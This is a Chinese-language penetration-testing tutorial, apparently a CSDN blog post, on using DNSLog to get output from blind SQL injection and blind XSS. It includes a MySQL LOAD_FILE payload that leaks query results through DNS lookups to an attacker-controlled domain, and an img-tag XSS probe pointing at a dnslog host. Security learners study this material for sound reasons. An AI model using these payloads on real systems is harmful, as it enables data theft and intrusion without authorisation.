使用DNSLog进行盲打

目录

DNSLog 

SQL盲注回显

无回显的XSS

更多盲打Payload


在渗透测试中,当我们碰到无回显的漏洞是非常难利用的。一是我们不知道存不存在漏洞,二是我们不知道漏洞执行的结果。因此,针对无回显的漏洞,我们可以通过使用DNSLog来进行回显。DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。  

DNSLog 

首先,我们都知道DNS的解析过程,递归查询和迭代查询相结合,传送门:DNS解析过程

这里我们可以控制的是域名的DNS服务器,也就是如下的 "baidu.com" 的DNS服务器。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。

DNSLog部署过程:

  • 申请一个域名,如 xie.com
  • 在我们的VPS上安装并配置DNS服务器
  • 将 xie.com 的DNS服务器设置为我们的VPS地址
  • 这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。

但是由于部署非常麻烦,所以我们可以通过一些在线的DNSLog平台:

SQL盲注回显

不管是布尔类型盲注还是时间盲注,都需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP。所以,如果条件允许,我们可以结合DNSlog来快速的回显数据。MySQL数据库,通过DNSlog盲注需要用到 load_file() 函数,该函数不仅能加载本地文件,同时也能对URL发起请求。因为需要使用 load_file() 函数,所以需要root权限,并且 secure_file_priv 需要为空。传送门:MySQL数据库中的文件操作函数(load_file()、into outfile、into dumpfile)

Payload如下:

SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx\\abc'));

执行的语句 

DNSLog平台收到的DNS查询

无回显的XSS

payload

<img src=http://hf8r67.dnslog.cn>

DNSLog平台收到的DNS查询

即可证明存在XSS

更多盲打Payload

更多漏洞的Payload,查看ceye的后台,

参考文章:使用DNSLOG拯救你的盲打盲注 

      

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值